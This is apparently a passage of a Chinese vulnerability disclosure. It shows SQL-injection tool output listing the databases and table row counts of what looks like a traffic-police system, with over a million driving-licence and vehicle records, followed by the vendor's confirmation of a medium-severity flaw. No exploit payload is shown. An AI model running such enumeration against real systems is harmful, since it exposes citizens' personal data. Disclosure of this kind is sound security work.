NewTripMember[19:24:24] [INFO] resumed: NewTripXB[19:24:24] [INFO] resumed: sitecmstest[19:24:24] [INFO] resumed: tempdb[19:24:24] [INFO] resumed: wztest[19:24:24] [INFO] resumed: xbtestavailable databases [12]:[*] cgs[*] gongan[*] master[*] model[*] msdb[*] NewTripKH[*] NewTripMember[*] NewTripXB[*] sitecmstest[*] tempdb[*] wztest[*] xbtest
Database: cgs+------------------------+---------+| Table | Entries |+------------------------+---------+| dbo.Web_WeifaChe | 1684209 || dbo.Web_drivingLicense | 1526014 || dbo.Web_VEHICLE | 1113756 || dbo.Web_WeiFa | 670576 || dbo.Web_drv_preasign | 488730 || dbo.SMSSendLogs | 448154 || dbo.SMSSentSave | 448154 || dbo.View_1 | 32418 || dbo.WEB_XB | 32395 || dbo.asks | 25232 || dbo.JszEditApp | 18020 || dbo.Web_User | 12814 || dbo.Web_dataLog | 9060 || dbo.WEB_XB_SMS | 7539 || dbo.CarEditApp | 6272 || dbo.webjianyi | 1557 || dbo.CheSYAPP | 541 || dbo.Web_JiaXiao | 44 || dbo.Web_ztsm | 31 || dbo.CheYYAPP | 24 || dbo.JszYwApp | 21 || dbo.Web_hospital | 20 || dbo.Web_Cards | 15 || dbo.Web_SqlLogs | 14 || dbo.Web_Menu | 13 || dbo.SMSConfig | 8 || dbo.wsyytype | 8 || dbo.dtproperties | 7 || dbo.Web_DataConfig | 5 || dbo.Web_Lasted_Up | 5 || dbo.asktype | 3 || dbo.ApiIpPass | 2 || dbo.CheSYConfig | 1 || dbo.Web_YouZheng | 1 |+------------------------+---------+
危害等级:中
漏洞Rank:6
确认时间:2015-11-03 09:20
感谢提交!!验证确认所描述的问题,已通知其修复。
暂无